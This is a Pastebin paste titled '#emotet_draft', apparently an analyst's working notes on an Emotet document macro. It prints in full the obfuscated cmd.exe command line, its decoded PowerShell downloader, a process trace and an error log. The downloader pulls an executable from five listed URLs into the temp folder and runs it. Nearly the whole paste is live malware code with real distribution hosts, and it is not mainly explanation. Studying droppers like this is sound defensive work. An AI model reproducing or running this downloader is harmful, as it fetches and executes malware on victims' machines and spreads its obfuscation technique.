API tools faq
paste
Advertisement
VRad

#emotet_draft

VRad
Jan 25th, 2019
260
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.21 KB | None | 0 0
raw download clone embed print report
  1. macro
  2. #####
  3. c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe /c CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (32;30;64;2;16;0;7;66;76;15;11;51;4;50;31;2;13;2;41;39;41;41;76;54;6;6;36;74;39;11;51;63;8;50;31;2;24;2;40;39;74;16;11;51;63;42;50;31;2;62;62;59;26;23;69;22;65;57;10;43;37;77;24;64;10;71;26;70;14;14;43;57;23;1;64;63;30;28;65;1;37;69;59;6;1;69;27;75;1;28;15;62;22;1;23;69;71;26;65;13;32;30;60;57;10;24;69;69;32;11;68;68;64;64;64;27;22;72;56;13;14;1;69;77;70;30;13;1;3;69;13;56;12;22;23;49;27;37;30;72;68;43;32;5;69;60;69;62;72;28;75;66;72;21;52;75;66;17;24;69;69;32;11;68;68;49;1;23;37;28;56;70;13;56;62;22;62;56;13;27;37;30;72;68;64;32;63;56;12;72;22;23;68;37;77;77;68;74;41;40;1;56;62;23;37;70;45;25;34;58;76;17;24;69;69;32;11;68;68;23;30;13;69;24;63;28;1;56;13;27;13;18;68;41;66;22;52;65;25;52;15;8;52;25;36;46;30;23;17;24;69;69;32;11;68;68;49;56;62;43;56;23;1;23;49;1;23;24;56;13;22;56;27;37;30;72;68;6;66;18;58;49;47;32;74;55;38;33;13;43;25;12;8;53;34;37;47;17;24;69;69;32;11;68;68;23;56;23;37;29;28;13;30;18;64;1;13;27;23;62;68;9;73;66;54;24;28;36;44;45;4;24;56;10;27;41;32;62;22;69;20;10;17;10;35;71;26;33;77;33;32;57;10;22;30;64;22;10;71;26;28;12;12;56;33;59;57;59;10;31;38;73;10;71;26;37;18;43;70;13;57;10;43;64;62;18;22;10;71;26;65;28;28;65;57;26;1;23;43;11;69;1;72;32;48;10;61;10;48;26;28;12;12;56;33;48;10;27;1;3;1;10;71;70;30;13;1;56;37;24;20;26;12;30;18;60;59;22;23;59;26;65;13;32;30;60;35;19;69;13;29;19;26;70;14;14;43;27;9;30;64;23;62;30;56;12;5;22;62;1;20;26;12;30;18;60;50;59;26;65;28;28;65;35;71;26;22;65;33;18;57;10;56;37;22;23;30;10;71;76;70;59;20;20;53;1;69;63;76;69;1;72;59;26;65;28;28;65;35;27;62;1;23;49;69;24;59;63;49;1;59;8;47;47;47;47;35;59;19;76;23;43;30;14;1;63;76;69;1;72;59;26;65;28;28;65;71;26;33;32;30;32;57;10;32;77;56;24;10;71;28;13;1;56;14;71;67;67;37;56;69;37;24;19;67;67;26;60;64;32;69;24;57;10;22;28;56;24;10;71;79)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
  4.  
  5. CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (32;30;64;2;16;0;7;66;76;15;11;51;4;50;31;2;13;2;41;39;41;41;76;54;6;6;36;74;39;11;51;63;8;50;31;2;24;2;40;39;74;16;11;51;63;42;50;31;2;62;62;59;26;23;69;22;65;57;10;43;37;77;24;64;10;71;26;70;14;14;43;57;23;1;64;63;30;28;65;1;37;69;59;6;1;69;27;75;1;28;15;62;22;1;23;69;71;26;65;13;32;30;60;57;10;24;69;69;32;11;68;68;64;64;64;27;22;72;56;13;14;1;69;77;70;30;13;1;3;69;13;56;12;22;23;49;27;37;30;72;68;43;32;5;69;60;69;62;72;28;75;66;72;21;52;75;66;17;24;69;69;32;11;68;68;49;1;23;37;28;56;70;13;56;62;22;62;56;13;27;37;30;72;68;64;32;63;56;12;72;22;23;68;37;77;77;68;74;41;40;1;56;62;23;37;70;45;25;34;58;76;17;24;69;69;32;11;68;68;23;30;13;69;24;63;28;1;56;13;27;13;18;68;41;66;22;52;65;25;52;15;8;52;25;36;46;30;23;17;24;69;69;32;11;68;68;49;56;62;43;56;23;1;23;49;1;23;24;56;13;22;56;27;37;30;72;68;6;66;18;58;49;47;32;74;55;38;33;13;43;25;12;8;53;34;37;47;17;24;69;69;32;11;68;68;23;56;23;37;29;28;13;30;18;64;1;13;27;23;62;68;9;73;66;54;24;28;36;44;45;4;24;56;10;27;41;32;62;22;69;20;10;17;10;35;71;26;33;77;33;32;57;10;22;30;64;22;10;71;26;28;12;12;56;33;59;57;59;10;31;38;73;10;71;26;37;18;43;70;13;57;10;43;64;62;18;22;10;71;26;65;28;28;65;57;26;1;23;43;11;69;1;72;32;48;10;61;10;48;26;28;12;12;56;33;48;10;27;1;3;1;10;71;70;30;13;1;56;37;24;20;26;12;30;18;60;59;22;23;59;26;65;13;32;30;60;35;19;69;13;29;19;26;70;14;14;43;27;9;30;64;23;62;30;56;12;5;22;62;1;20;26;12;30;18;60;50;59;26;65;28;28;65;35;71;26;22;65;33;18;57;10;56;37;22;23;30;10;71;76;70;59;20;20;53;1;69;63;76;69;1;72;59;26;65;28;28;65;35;27;62;1;23;49;69;24;59;63;49;1;59;8;47;47;47;47;35;59;19;76;23;43;30;14;1;63;76;69;1;72;59;26;65;28;28;65;71;26;33;32;30;32;57;10;32;77;56;24;10;71;28;13;1;56;14;71;67;67;37;56;69;37;24;19;67;67;26;60;64;32;69;24;57;10;22;28;56;24;10;71;79)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
  6.  
  7. C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';"
  8.  
  9. C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e "
  10.  
  11. C:\Windows\system32\cmd.exe /c assoc.cmd
  12.  
  13. cmd
  14.  
  15. powershtll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
  16.  
  17. dry_run
  18. #######
  19. c:\windows\SysWOW64\cmd.exe c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (32;30;64;2;16;0;7;66;76;15;11;51;4;50;31;2;13;2;41;39;41;41;76;54;6;6;36;74;39;11;51;63;8;50;31;2;24;2;40;39;74;16;11;51;63;42;50;31;2;62;62;59;26;23;69;22;65;57;10;43;37;77;24;64;10;71;26;70;14;14;43;57;23;1;64;63;30;28;65;1;37;69;59;6;1;69;27;75;1;28;15;62;22;1;23;69;71;26;65;13;32;30;60;57;10;24;69;69;32;11;68;68;64;64;64;27;22;72;56;13;14;1;69;77;70;30;13;1;3;69;13;56;12;22;23;49;27;37;30;72;68;43;32;5;69;60;69;62;72;28;75;66;72;21;52;75;66;17;24;69;69;32;11;68;68;49;1;23;37;28;56;70;13;56;62;22;62;56;13;27;37;30;72;68;64;32;63;56;12;72;22;23;68;37;77;77;68;74;41;40;1;56;62;23;37;70;45;25;34;58;76;17;24;69;69;32;11;68;68;23;30;13;69;24;63;28;1;56;13;27;13;18;68;41;66;22;52;65;25;52;15;8;52;25;36;46;30;23;17;24;69;69;32;11;68;68;49;56;62;43;56;23;1;23;49;1;23;24;56;13;22;56;27;37;30;72;68;6;66;18;58;49;47;32;74;55;38;33;13;43;25;12;8;53;34;37;47;17;24;69;69;32;11;68;68;23;56;23;37;29;28;13;30;18;64;1;13;27;23;62;68;9;73;66;54;24;28;36;44;45;4;24;56;10;27;41;32;62;22;69;20;10;17;10;35;71;26;33;77;33;32;57;10;22;30;64;22;10;71;26;28;12;12;56;33;59;57;59;10;31;38;73;10;71;26;37;18;43;70;13;57;10;43;64;62;18;22;10;71;26;65;28;28;65;57;26;1;23;43;11;69;1;72;32;48;10;61;10;48;26;28;12;12;56;33;48;10;27;1;3;1;10;71;70;30;13;1;56;37;24;20;26;12;30;18;60;59;22;23;59;26;65;13;32;30;60;35;19;69;13;29;19;26;70;14;14;43;27;9;30;64;23;62;30;56;12;5;22;62;1;20;26;12;30;18;60;50;59;26;65;28;28;65;35;71;26;22;65;33;18;57;10;56;37;22;23;30;10;71;76;70;59;20;20;53;1;69;63;76;69;1;72;59;26;65;28;28;65;35;27;62;1;23;49;69;24;59;63;49;1;59;8;47;47;47;47;35;59;19;76;23;43;30;14;1;63;76;69;1;72;59;26;65;28;28;65;71;26;33;32;30;32;57;10;32;77;56;24;10;71;28;13;1;56;14;71;67;67;37;56;69;37;24;19;67;67;26;60;64;32;69;24;57;10;22;28;56;24;10;71;79)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
  20. C:\Windows\SysWOW64\cmd.exe CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (32;30;64;2;16;0;7;66;76;15;11;51;4;50;31;2;13;2;41;39;41;41;76;54;6;6;36;74;39;11;51;63;8;50;31;2;24;2;40;39;74;16;11;51;63;42;50;31;2;62;62;59;26;23;69;22;65;57;10;43;37;77;24;64;10;71;26;70;14;14;43;57;23;1;64;63;30;28;65;1;37;69;59;6;1;69;27;75;1;28;15;62;22;1;23;69;71;26;65;13;32;30;60;57;10;24;69;69;32;11;68;68;64;64;64;27;22;72;56;13;14;1;69;77;70;30;13;1;3;69;13;56;12;22;23;49;27;37;30;72;68;43;32;5;69;60;69;62;72;28;75;66;72;21;52;75;66;17;24;69;69;32;11;68;68;49;1;23;37;28;56;70;13;56;62;22;62;56;13;27;37;30;72;68;64;32;63;56;12;72;22;23;68;37;77;77;68;74;41;40;1;56;62;23;37;70;45;25;34;58;76;17;24;69;69;32;11;68;68;23;30;13;69;24;63;28;1;56;13;27;13;18;68;41;66;22;52;65;25;52;15;8;52;25;36;46;30;23;17;24;69;69;32;11;68;68;49;56;62;43;56;23;1;23;49;1;23;24;56;13;22;56;27;37;30;72;68;6;66;18;58;49;47;32;74;55;38;33;13;43;25;12;8;53;34;37;47;17;24;69;69;32;11;68;68;23;56;23;37;29;28;13;30;18;64;1;13;27;23;62;68;9;73;66;54;24;28;36;44;45;4;24;56;10;27;41;32;62;22;69;20;10;17;10;35;71;26;33;77;33;32;57;10;22;30;64;22;10;71;26;28;12;12;56;33;59;57;59;10;31;38;73;10;71;26;37;18;43;70;13;57;10;43;64;62;18;22;10;71;26;65;28;28;65;57;26;1;23;43;11;69;1;72;32;48;10;61;10;48;26;28;12;12;56;33;48;10;27;1;3;1;10;71;70;30;13;1;56;37;24;20;26;12;30;18;60;59;22;23;59;26;65;13;32;30;60;35;19;69;13;29;19;26;70;14;14;43;27;9;30;64;23;62;30;56;12;5;22;62;1;20;26;12;30;18;60;50;59;26;65;28;28;65;35;71;26;22;65;33;18;57;10;56;37;22;23;30;10;71;76;70;59;20;20;53;1;69;63;76;69;1;72;59;26;65;28;28;65;35;27;62;1;23;49;69;24;59;63;49;1;59;8;47;47;47;47;35;59;19;76;23;43;30;14;1;63;76;69;1;72;59;26;65;28;28;65;71;26;33;32;30;32;57;10;32;77;56;24;10;71;28;13;1;56;14;71;67;67;37;56;69;37;24;19;67;67;26;60;64;32;69;24;57;10;22;28;56;24;10;71;79)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
  21. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';"
  22. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e "
  23. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c assoc.cmd
  24. C:\Windows\SysWOW64\cmd.exe
  25.  
  26. error (without DOSKEY and renaming)
  27. ####################################
  28. C:\Users\operator>set p0QM=!p0QM!!78QN:~79,1! && if 79 GTR 78 echo !p0QM:~6! | FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e
  29.  
  30. C:\Users\operator>cmd
  31. Microsoft Windows [Version 6.1.7601]
  32. Copyright (c) 2009 Microsoft Corporation. All rights reserved.
  33.  
  34. C:\Users\operator>powershtll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
  35.  
  36. 'powershtll' is not recognized as an internal or external command, operable program or batch file.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!